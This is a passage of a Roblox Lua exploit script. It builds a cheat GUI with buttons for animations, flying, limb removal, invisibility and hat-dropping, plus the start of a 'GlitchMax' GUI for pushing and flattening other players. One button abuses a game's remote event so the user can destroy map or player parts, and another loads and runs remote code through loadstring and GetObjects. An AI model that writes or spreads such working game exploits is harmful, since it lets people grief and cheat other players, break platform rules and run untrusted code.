Chop.BorderSizePixel = 0 Chop.Position = UDim2.new(0,120,0,30) Chop.Size = UDim2.new(0,100,0,30) Chop.Font = "SourceSansItalic" Chop.FontSize = "Size18" Chop.Text = "Chop" Chop.TextColor3 = Color3.fromRGB(230,230,230) Chop.TextWrapped = true local Dance = Chop:Clone() Dance.Name = "Dance" Dance.Parent = Background Dance.Position = UDim2.new(0,120,0,70) Dance.Text = "Dance" local ArmsOut = Chop:Clone() ArmsOut.Name = "ArmsOut" ArmsOut.Parent = Background ArmsOut.Position = UDim2.new(0,10,0,110) ArmsOut.Text = "ArmsOut" local Stab = Chop:Clone() Stab.Name = "Stab" Stab.Parent = Background Stab.Position = UDim2.new(0,10,0,30) Stab.Text = "Stab" local SmellyRun = Chop:Clone() SmellyRun.Name = "SmellyRun" SmellyRun.Parent = Background SmellyRun.Position = UDim2.new(0,10,0,70) SmellyRun.Text = "SmellyRun" local rando = Chop:Clone() rando.Name = "rando" rando.Parent = Background rando.Position = UDim2.new(0,120,0,110) rando.Text = "rando" local hmm = Chop:Clone() hmm.Name = "hmm" hmm.Parent = Background hmm.Position = UDim2.new(0,120,0,150) hmm.Text = "hmm" local Kick = Chop:Clone() Kick.Name = "Kick" Kick.Parent = Background Kick.Position = UDim2.new(0,10,0,150) Kick.Size = UDim2.new(0,100,0,30) Kick.Text = "Kick" local Flying = Chop:Clone() Flying.Name = "Flying" Flying.Parent = Background Flying.Position = UDim2.new(0,230,0,30) Flying.Size = UDim2.new(0,100,0,30) Flying.Text = "Flying" local Arms = Chop:Clone() Arms.Name = "Arms" Arms.Parent = Background Arms.Position = UDim2.new(0,230,0,70) Arms.Size = UDim2.new(0,100,0,30) Arms.Text = "Arms" local Sword = Chop:Clone() Sword.Name = "Sword" Sword.Parent = Background Sword.Position = UDim2.new(0,230,0,110) Sword.Size = UDim2.new(0,100,0,30) Sword.Text = "Sword" local Insane = Chop:Clone() Insane.Name = "Insane" Insane.Parent = Background Insane.Position = UDim2.new(0,230,0,150) Insane.Size = UDim2.new(0,100,0,30) Insane.Text = "Insane" -- local plr = game:GetService("Players").LocalPlayer local mouse = plr:GetMouse() lpc = game:GetService("Players").LocalPlayer.Character weld1 = Instance.new("Weld") Chop.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33169596" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Insane.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33796059" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(10000) end end end) Arms.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33169583" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Sword.MouseButton1Click:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "35978879" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) hmm.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "33855276" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) rando.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "48977286" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Dance.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "35654637" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Stab.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "66703241" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Kick.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "45737360" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) Flying.MouseButton1Down:connect(function() flying = not flying repeat wait() until game:GetService("Players").LocalPlayer and game:GetService("Players").LocalPlayer.Character and game:GetService("Players").LocalPlayer.Character:findFirstChild("Torso") and game:GetService("Players").LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game:GetService("Players").LocalPlayer:GetMouse() repeat wait() until mouse local plr = game:GetService("Players").LocalPlayer local torso = plr.Character.Torso local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 70 local speed = 0 if flying then Fly.BackgroundColor3 = loc else Fly.BackgroundColor3 = col end function FlyFunction() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end) FlyFunction() end) SmellyRun.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "30235165" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) ArmsOut.MouseButton1Down:connect(function() local gg = mouse.Target if gg ~= nil then for i,v in pairs(game:GetService("Players"):GetPlayers()) do AnimationId = "27432691" local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://"..AnimationId local k = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) k:Play() k:AdjustSpeed(1) end end end) end) CreeperR6.Name = "Creeper R6" CreeperR6.Parent = MainBody CreeperR6.BackgroundColor3 = Color3.new(0, 0.615686, 1) CreeperR6.Position = UDim2.new(-0.000271856785, 0, 0.194331974, 0) CreeperR6.Size = UDim2.new(0, 106, 0, 27) CreeperR6.Font = Enum.Font.SciFi CreeperR6.Text = "Creeper (R6)" CreeperR6.TextColor3 = Color3.new(1, 1, 1) CreeperR6.TextSize = 14 CreeperR6.MouseButton1Down:connect(function() game:GetService("Players").LocalPlayer.Character.Head.Mesh:Destroy() game:GetService("Players").LocalPlayer.Character["Left Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Arm"]:Destroy() end) CreeperR15.Name = "Creeper R15" CreeperR15.Parent = MainBody CreeperR15.BackgroundColor3 = Color3.new(0, 0.615686, 1) CreeperR15.Position = UDim2.new(0.349042743, 0, 0.192480117, 0) CreeperR15.Size = UDim2.new(0, 106, 0, 27) CreeperR15.Font = Enum.Font.SciFi CreeperR15.Text = "Creeper (R15)" CreeperR15.TextColor3 = Color3.new(1, 1, 1) CreeperR15.TextSize = 14 CreeperR15.MouseButton1Down:connect(function() game:GetService("Players").LocalPlayer.Character.Head.Mesh:Destroy() game:GetService("Players").LocalPlayer.Character.LeftHand:Destroy() game:GetService("Players").LocalPlayer.Character.LeftLowerArm:Destroy() game:GetService("Players").LocalPlayer.Character.LeftUpperArm:Destroy() game:GetService("Players").LocalPlayer.Character.RightHand:Destroy() game:GetService("Players").LocalPlayer.Character.RightLowerArm:Destroy() game:GetService("Players").LocalPlayer.Character.RightUpperArm:Destroy() end) AnimationsR15.Name = "Animations R15" AnimationsR15.Parent = MainBody AnimationsR15.BackgroundColor3 = Color3.new(0, 0.615686, 1) AnimationsR15.Position = UDim2.new(0.698873341, 0, 0.34988755, 0) AnimationsR15.Size = UDim2.new(0, 106, 0, 27) AnimationsR15.Font = Enum.Font.SciFi AnimationsR15.Text = "Animations (R15)" AnimationsR15.TextColor3 = Color3.new(1, 1, 1) AnimationsR15.TextSize = 14 AnimationsR15.MouseButton1Down:connect(function() loadstring(Game:GetObjects("rbxassetid://1202558084")[1].Source)() end) FEDropHats.Name = "FE DropHats" FEDropHats.Parent = MainBody FEDropHats.BackgroundColor3 = Color3.new(0, 0.615686, 1) FEDropHats.Position = UDim2.new(0.347598553, 0, 0.34988755, 0) FEDropHats.Size = UDim2.new(0, 106, 0, 27) FEDropHats.Font = Enum.Font.SciFi FEDropHats.Text = "FE DropHats" FEDropHats.TextColor3 = Color3.new(1, 1, 1) FEDropHats.TextSize = 14 FEDropHats.MouseButton1Down:connect(function() local a=Instance.new("ScreenGui")a.Parent=game:GetService("CoreGui");local b=Instance.new("Frame")b.BackgroundTransparency=1;b.Parent=a;local c=Instance.new("TextButton")c.Active=true;c.BackgroundColor3=Color3.new(0.827451,0,0.0117647)c.BorderSizePixel=0;c.Name="topbar"c.Position=UDim2.new(4.84556389,0,3.46589231,0)c.Selectable=true;c.Size=UDim2.new(0,297,0,31)c.Style=Enum.ButtonStyle.Custom;c.Font=Enum.Font.Legacy;c.FontSize=Enum.FontSize.Size14;c.Text=""c.Draggable=true;c.Parent=b;local d=Instance.new("Frame")d.BackgroundColor3=Color3.new(0.678431,0,0.00784314)d.BackgroundTransparency=0.55000001192093;d.BorderSizePixel=0;d.Size=UDim2.new(0,297,0,160)d.Draggable=true;d.Parent=c;local e=Instance.new("TextButton")e.Active=true;e.BackgroundColor3=Color3.new(0.713726,0.121569,0.133333)e.Position=UDim2.new(0.0404040404,0,0.268750012,0)e.Selectable=true;e.Size=UDim2.new(0,126,0,73)e.Style=Enum.ButtonStyle.Custom;e.Font=Enum.Font.Highway;e.FontSize=Enum.FontSize.Size32;e.Text="DROP"e.TextColor3=Color3.new(1,1,1)e.TextStrokeColor3=Color3.new(1,0,0.0156863)e.TextStrokeTransparency=0;e.Parent=d;local f=Instance.new("TextButton")f.Active=true;f.BackgroundColor3=Color3.new(0.713726,0.121569,0.133333)f.Position=UDim2.new(0.537963867,0,0.268750012,0)f.Selectable=true;f.Size=UDim2.new(0,126,0,73)f.Style=Enum.ButtonStyle.Custom;f.Font=Enum.Font.Highway;f.FontSize=Enum.FontSize.Size24;f.Text="Hats = Blocks"f.TextColor3=Color3.new(1,1,1)f.TextStrokeColor3=Color3.new(1,0,0.0156863)f.TextStrokeTransparency=0;f.TextWrapped=true;f.Parent=d;local g=Instance.new("TextLabel")g.BackgroundColor3=Color3.new(0.611765,0,0.00784314)g.BorderSizePixel=0;g.Position=UDim2.new(0,0,0.837499976,0)g.Size=UDim2.new(0,297,0,26)g.Font=Enum.Font.Highway;g.FontSize=Enum.FontSize.Size18;g.Text="This was made by I low."g.TextColor3=Color3.new(1,1,1)g.Parent=d;local h=Instance.new("TextLabel")h.BackgroundColor3=Color3.new(0.639216,0.635294,0.647059)h.BackgroundTransparency=1;h.BorderSizePixel=0;h.Size=UDim2.new(0,297,0,31)h.Font=Enum.Font.Highway;h.FontSize=Enum.FontSize.Size18;h.Text="FE Drop Hats"h.TextColor3=Color3.new(1,1,1)h.Parent=d;local i=Instance.new("TextButton")i.Active=true;i.BackgroundColor3=Color3.new(0.815686,0,0)i.Position=UDim2.new(0,0,0.947432756,0)i.Selectable=true;i.Size=UDim2.new(0,98,0,43)i.Style=Enum.ButtonStyle.Custom;i.Font=Enum.Font.Highway;i.FontSize=Enum.FontSize.Size14;i.Text="Hide/Show"i.TextColor3=Color3.new(1,1,1)i.Parent=a;e.MouseButton1Click:connect(function()local j=game:GetService("Players").LocalPlayer;for k,l in pairs(j.Character:GetChildren())do if l:IsA'Accoutrement'then l.Parent=game:GetService("Workspace") end end end)f.MouseButton1Click:connect(function()local j=game:GetService("Players").LocalPlayer;for k,l in pairs(j.Character:GetChildren())do if l:IsA'Accoutrement'then l.Handle.Mesh:Destroy()end end end)i.MouseButton1Click:connect(function()if b.Visible==true then b.Visible=false elseif b.Visible==false then b.Visible=true end end) end) NoLimbs.Name = "No Limbs" NoLimbs.Parent = MainBody NoLimbs.BackgroundColor3 = Color3.new(0, 0.615686, 1) NoLimbs.Position = UDim2.new(-0.000843375921, 0, 0.34988755, 0) NoLimbs.Size = UDim2.new(0, 106, 0, 27) NoLimbs.Font = Enum.Font.SciFi NoLimbs.Text = "No lmbs" NoLimbs.TextColor3 = Color3.new(1, 1, 1) NoLimbs.TextSize = 14 NoLimbs.MouseButton1Down:connect(function() game:GetService("Players").LocalPlayer.Character["Left Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Left Arm"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Leg"]:Destroy() game:GetService("Players").LocalPlayer.Character["Right Arm"]:Destroy() end) FEbtools.Name = "FE btools" FEbtools.Parent = MainBody FEbtools.BackgroundColor3 = Color3.new(0, 0.615686, 1) FEbtools.Position = UDim2.new(-0.000843375921, 0, 0.501739383, 0) FEbtools.Size = UDim2.new(0, 106, 0, 27) FEbtools.Font = Enum.Font.SciFi FEbtools.Text = "FE btools" FEbtools.TextColor3 = Color3.new(1, 1, 1) FEbtools.TextSize = 14 FEbtools.MouseButton1Down:connect(function() maind = nil if game:GetService("Workspace"):FindFirstChild'GiveSystem' then if game:GetService("Workspace").GiveSystem:FindFirstChild'GiveItem' then maind = workspace.GiveSystem.GiveItem end end if game:GetService("Workspace"):FindFirstChild'HandToCentre' then if game:GetService("Workspace").HandToCentre:FindFirstChild'SendItem' then maind = game:GetService("Workspace").HandToCentre.SendItem end end if maind == nil then print'could not find give event :(' return end tool = Instance.new'Tool' me = game:GetService'Players'.LocalPlayer tool.RequiresHandle = false tool.TextureId = 'http://www.roblox.com/asset/?id=12223874' tool.Name = 'ya like jazz?' tool.Parent = me.Backpack buttonf = nil tool.Equipped:connect(function() local m = game:GetService'Players'.LocalPlayer:GetMouse() m.Icon = 'rbxasset://textures/HammerCursor.png' buttonf = m.Button1Down:connect(function() if m.Target == nil then return end local ob = m.Target if ob:IsA'BasePart' or ob:IsA'WedgePart' then if ob:IsDescendantOf(me.Character) then return end m.Icon = 'rbxasset://textures/HammerOverCursor.png' local ex = Instance.new'Explosion' ex.BlastRadius = 0 ex.Position = ob.Position ex.Parent = workspace maind:FireServer(workspace, ob) wait(0.3) m.Icon = 'rbxasset://textures/HammerCursor.png' end end) end) tool.Unequipped:connect(function() if buttonf ~= nil then buttonf:Disconnect() buttonf = nil end local m = game:GetService'Players'.LocalPlayer:GetMouse() m.Icon = '' end) end) FlyR6.Name = "Fly (R6)" FlyR6.Parent = MainBody FlyR6.BackgroundColor3 = Color3.new(0, 0.615686, 1) FlyR6.Position = UDim2.new(0.347598553, 0, 0.501739383, 0) FlyR6.Size = UDim2.new(0, 106, 0, 27) FlyR6.Font = Enum.Font.SciFi FlyR6.Text = "Fly (R6)" FlyR6.TextColor3 = Color3.new(1, 1, 1) FlyR6.TextSize = 14 FlyR6.MouseButton1Down:connect(function() -- FLY SCRIPT BY RGEENEUS -- The following code should be in a local script. -- Only works on PC, not xbox or mobile. I do not have devices to test on. -- Call the start fly function AFTER the character exists to fly. The function does not run if there is no character. local speed = 50 -- This is the fly speed. Change it to whatever you like. The variable can be changed while running local c local h local bv local bav local cam local flying local p = game:GetService("Players").LocalPlayer local buttons = {W = false, S = false, A = false, D = false, Moving = false} local startFly = function () -- Call this function to begin flying if not p.Character or not p.Character.Head or flying then return end c = p.Character h = c.Humanoid h.PlatformStand = true cam = game:GetService("Workspace"):WaitForChild('Camera') bv = Instance.new("BodyVelocity") bav = Instance.new("BodyAngularVelocity") bv.Velocity, bv.MaxForce, bv.P = Vector3.new(0, 0, 0), Vector3.new(10000, 10000, 10000), 1000 bav.AngularVelocity, bav.MaxTorque, bav.P = Vector3.new(0, 0, 0), Vector3.new(10000, 10000, 10000), 1000 bv.Parent = c.Head bav.Parent = c.Head flying = true h.Died:connect(function() flying = false end) end local endFly = function () -- Call this function to stop flying if not p.Character or not flying then return end h.PlatformStand = false bv:Destroy() bav:Destroy() flying = false end game:GetService("UserInputService").InputBegan:connect(function (input, GPE) if GPE then return end for i, e in pairs(buttons) do if i ~= "Moving" and input.KeyCode == Enum.KeyCode[i] then buttons[i] = true buttons.Moving = true end end end) game:GetService("UserInputService").InputEnded:connect(function (input, GPE) if GPE then return end local a = false for i, e in pairs(buttons) do if i ~= "Moving" then if input.KeyCode == Enum.KeyCode[i] then buttons[i] = false end if buttons[i] then a = true end end end buttons.Moving = a end) local setVec = function (vec) return vec * (speed / vec.Magnitude) end game:GetService("RunService").Heartbeat:connect(function (step) -- The actual fly function, called every frame if flying and c and c.PrimaryPart then local p = c.PrimaryPart.Position local cf = cam.CFrame local ax, ay, az = cf:toEulerAnglesXYZ() c:SetPrimaryPartCFrame(CFrame.new(p.x, p.y, p.z) * CFrame.Angles(ax, ay, az)) if buttons.Moving then local t = Vector3.new() if buttons.W then t = t + (setVec(cf.lookVector)) end if buttons.S then t = t - (setVec(cf.lookVector)) end if buttons.A then t = t - (setVec(cf.rightVector)) end if buttons.D then t = t + (setVec(cf.rightVector)) end c:TranslateBy(t * step) end end end) end) FEinvisible.Name = "FE invisible" FEinvisible.Parent = MainBody FEinvisible.BackgroundColor3 = Color3.new(0, 0.615686, 1) FEinvisible.Position = UDim2.new(0.698873341, 0, 0.501739383, 0) FEinvisible.Size = UDim2.new(0, 106, 0, 27) FEinvisible.Font = Enum.Font.SciFi FEinvisible.Text = "FE Invisible (R6)" FEinvisible.TextColor3 = Color3.new(1, 1, 1) FEinvisible.TextSize = 14 FEinvisible.MouseButton1Down:connect(function() Local = game:GetService('Players').LocalPlayer Char = Local.Character touched,tpdback = false, false Local.CharacterAdded:connect(function(char) if script.Disabled ~= true then wait(.25) loc = Char.HumanoidRootPart.Position Char:MoveTo(box.Position + Vector3.new(0,.5,0)) end end) game:GetService('UserInputService').InputBegan:connect(function(key) if key.KeyCode == Enum.KeyCode.Equals then if script.Disabled ~= true then script.Disabled = true print'you may re-execute' end end end) box = Instance.new('Part',workspace) box.Anchored = true box.CanCollide = true box.Size = Vector3.new(10,1,10) box.Position = Vector3.new(0,10000,0) box.Touched:connect(function(part) if (part.Parent.Name == Local.Name) then if touched == false then touched = true function apply() if script.Disabled ~= true then no = Char.HumanoidRootPart:Clone() wait(.25) Char.HumanoidRootPart:Destroy() no.Parent = Char Char:MoveTo(loc) touched = false end end if Char then apply() end end end end) repeat wait() until Char loc = Char.HumanoidRootPart.Position Char:MoveTo(box.Position + Vector3.new(0,.5,0)) end) Glitchmax.Name = "Glitchmax" Glitchmax.Parent = MainBody Glitchmax.BackgroundColor3 = Color3.new(0, 0.615686, 1) Glitchmax.Position = UDim2.new(-0.000843346119, 0, 0.653591216, 0) Glitchmax.Size = UDim2.new(0, 106, 0, 27) Glitchmax.Font = Enum.Font.SciFi Glitchmax.Text = "Glitchmax GUI" Glitchmax.TextColor3 = Color3.new(1, 1, 1) Glitchmax.TextSize = 14 Glitchmax.MouseButton1Down:connect(function() -- Objects local GlitchMax = Instance.new("ScreenGui") local MainFrame = Instance.new("Frame") local TopFrame = Instance.new("Frame") local Title = Instance.new("TextLabel") local CloseGUI = Instance.new("TextButton") local Credit = Instance.new("TextLabel") local DetailTopFrame = Instance.new("Frame") local ButtonFrame = Instance.new("Frame") local UserBox = Instance.new("TextBox") local Flatten = Instance.new("TextButton") local Push = Instance.new("TextButton") local LockOn = Instance.new("TextButton") local Float = Instance.new("TextButton") local Stick = Instance.new("TextButton") local Experimental = Instance.new("TextButton") local SideFrame = Instance.new("Frame") local OpenGUI = Instance.new("TextButton") local SideCredit = Instance.new("TextLabel") local SideTitle = Instance.new("TextLabel") -- Properties GlitchMax.Name = "GlitchMax" GlitchMax.Parent = game:GetService("CoreGui") MainFrame.Name = "MainFrame" MainFrame.Parent = GlitchMax MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.new(1, 1, 1) MainFrame.BackgroundTransparency = 1 MainFrame.Draggable = true MainFrame.Position = UDim2.new(0, 570, 0, 61) MainFrame.Size = UDim2.new(0, 376, 0, 285) TopFrame.Name = "TopFrame" TopFrame.Parent = MainFrame TopFrame.BackgroundColor3 = Color3.new(0.466667, 0.47451, 1) TopFrame.Size = UDim2.new(0, 376, 0, 36) Title.Name = "Title" Title.Parent = TopFrame Title.BackgroundColor3 = Color3.new(1, 1, 1) Title.BackgroundTransparency = 1 Title.Size = UDim2.new(0, 376, 0, 36) Title.Font = Enum.Font.Highway Title.FontSize = Enum.FontSize.Size14 Title.Text = "GlitchMax" Title.TextColor3 = Color3.new(0.243137, 0.372549, 0.4) Title.TextScaled = true Title.TextSize = 14 Title.TextStrokeColor3 = Color3.new(1, 1, 1) Title.TextStrokeTransparency = 0 Title.TextWrapped = true CloseGUI.Name = "CloseGUI" CloseGUI.Parent = TopFrame CloseGUI.BackgroundColor3 = Color3.new(1, 1, 1) CloseGUI.BackgroundTransparency = 1 CloseGUI.Position = UDim2.new(0, 327, 0, 0) CloseGUI.Size = UDim2.new(0, 49, 0, 36) CloseGUI.Font = Enum.Font.SourceSans CloseGUI.FontSize = Enum.FontSize.Size60 CloseGUI.Text = "X" CloseGUI.TextSize = 50 Credit.Name = "Credit" Credit.Parent = TopFrame Credit.BackgroundColor3 = Color3.new(1, 1, 1) Credit.BackgroundTransparency = 1 Credit.Position = UDim2.new(0, 16, 0, 0) Credit.Size = UDim2.new(0, 96, 0, 36) Credit.Font = Enum.Font.Highway Credit.FontSize = Enum.FontSize.Size14 Credit.Text = "illremember" Credit.TextColor3 = Color3.new(0.431373, 0.662745, 0.709804) Credit.TextScaled = true Credit.TextSize = 14 Credit.TextStrokeColor3 = Color3.new(1, 1, 1) Credit.TextStrokeTransparency = 0 Credit.TextWrapped = true DetailTopFrame.Name = "DetailTopFrame" DetailTopFrame.Parent = MainFrame DetailTopFrame.BackgroundColor3 = Color3.new(0.541176, 0.678431, 1) DetailTopFrame.Position = UDim2.new(0, 0, 0, 37) DetailTopFrame.Size = UDim2.new(0, 376, 0, 11) ButtonFrame.Name = "ButtonFrame" ButtonFrame.Parent = MainFrame ButtonFrame.BackgroundColor3 = Color3.new(0.945098, 0.945098, 0.945098) ButtonFrame.Position = UDim2.new(0, 0, 0, 49) ButtonFrame.Size = UDim2.new(0, 376, 0, 236) UserBox.Name = "UserBox" UserBox.Parent = ButtonFrame UserBox.BackgroundColor3 = Color3.new(0.898039, 0.898039, 0.898039) UserBox.BorderColor3 = Color3.new(0.360784, 0.384314, 0.392157) UserBox.BorderSizePixel = 5 UserBox.Position = UDim2.new(0, 33, 0, 15) UserBox.Size = UDim2.new(0, 310, 0, 31) UserBox.Font = Enum.Font.SourceSans UserBox.FontSize = Enum.FontSize.Size14 UserBox.Text = "" UserBox.TextScaled = true UserBox.TextSize = 14 UserBox.TextWrapped = true Flatten.Name = "Flatten" Flatten.Parent = ButtonFrame Flatten.BackgroundColor3 = Color3.new(0.254902, 0.254902, 0.254902) Flatten.BorderColor3 = Color3.new(0.368627, 0.576471, 0.72549) Flatten.BorderSizePixel = 2 Flatten.Position = UDim2.new(0, 22, 0, 66) Flatten.Size = UDim2.new(0, 135, 0, 36) Flatten.Font = Enum.Font.Highway Flatten.FontSize = Enum.FontSize.Size32 Flatten.Text = "Flatten" Flatten.TextColor3 = Color3.new(0.827451, 0.827451, 0.827451) Flatten.TextScaled = true Flatten.TextSize = 30 Flatten.TextWrapped = true Push.Name = "Push" Push.Parent = ButtonFrame Push.BackgroundColor3 = Color3.new(0.254902, 0.254902, 0.254902) Push.BorderColor3 = Color3.new(0.368627, 0.576471, 0.72549) Push.BorderSizePixel = 2 Push.Position = UDim2.new(0, 22, 0, 126) Push.Size = UDim2.new(0, 135, 0, 36) Push.Font = Enum.Font.Highway Push.FontSize = Enum.FontSize.Size32 Push.Text = "Push" Push.TextColor3 = Color3.new(0.827451, 0.827451, 0.827451) Push.TextScaled = true Push.TextSize = 30 Push.TextWrapped = true LockOn.Name = "LockOn" LockOn.Parent = ButtonFrame LockOn.BackgroundColor3 = Color3.new(0.254902, 0.254902, 0.254902) LockOn.BorderColor3 = Color3.new(0.368627, 0.576471, 0.72549) LockOn.BorderSizePixel = 2 LockOn.Position = UDim2.new(0, 22, 0, 186) LockOn.Size = UDim2.new(0, 135, 0, 36) LockOn.Font = Enum.Font.Highway LockOn.FontSize = Enum.FontSize.Size32 LockOn.Text = "LockOn" LockOn.TextColor3 = Color3.new(0.827451, 0.827451, 0.827451) LockOn.TextSize = 30 LockOn.TextWrapped = true Float.Name = "Float" Float.Parent = ButtonFrame Float.BackgroundColor3 = Color3.new(0.254902, 0.254902, 0.254902) Float.BorderColor3 = Color3.new(0.368627, 0.576471, 0.72549) Float.BorderSizePixel = 2 Float.Position = UDim2.new(0, 218, 0, 66) Float.Size = UDim2.new(0, 135, 0, 36) Float.Font = Enum.Font.Highway Float.FontSize = Enum.FontSize.Size32 Float.Text = "Float" Float.TextColor3 = Color3.new(0.827451, 0.827451, 0.827451) Float.TextScaled = true Float.TextSize = 30 Float.TextWrapped = true Stick.Name = "Stick" Stick.Parent = ButtonFrame Stick.BackgroundColor3 = Color3.new(0.254902, 0.254902, 0.254902) Stick.BorderColor3 = Color3.new(0.368627, 0.576471, 0.72549) Stick.BorderSizePixel = 2 Stick.Position = UDim2.new(0, 218, 0, 126) Stick.Size = UDim2.new(0, 135, 0, 36) Stick.Font = Enum.Font.Highway Stick.FontSize = Enum.FontSize.Size32 Stick.Text = "Stick" Stick.TextColor3 = Color3.new(0.827451, 0.827451, 0.827451) Stick.TextSize = 30 Stick.TextWrapped = true Experimental.Name = "Experimental" Experimental.Parent = ButtonFrame Experimental.BackgroundColor3 = Color3.new(0.254902, 0.254902, 0.254902) Experimental.BorderColor3 = Color3.new(0.368627, 0.576471, 0.72549) Experimental.BorderSizePixel = 2 Experimental.Position = UDim2.new(0, 218, 0, 186) Experimental.Size = UDim2.new(0, 135, 0, 36) Experimental.Font = Enum.Font.Highway Experimental.FontSize = Enum.FontSize.Size28 Experimental.Text = "Experimental" Experimental.TextColor3 = Color3.new(0.827451, 0.827451, 0.827451) Experimental.TextSize = 25 Experimental.TextWrapped = true SideFrame.Name = "SideFrame" SideFrame.Parent = GlitchMax SideFrame.Active = true SideFrame.BackgroundColor3 = Color3.new(0.466667, 0.47451, 1) SideFrame.Draggable = true SideFrame.Position = UDim2.new(0, 570, 0, 61) SideFrame.Size = UDim2.new(0, 376, 0, 36) SideFrame.Visible = false OpenGUI.Name = "OpenGUI" 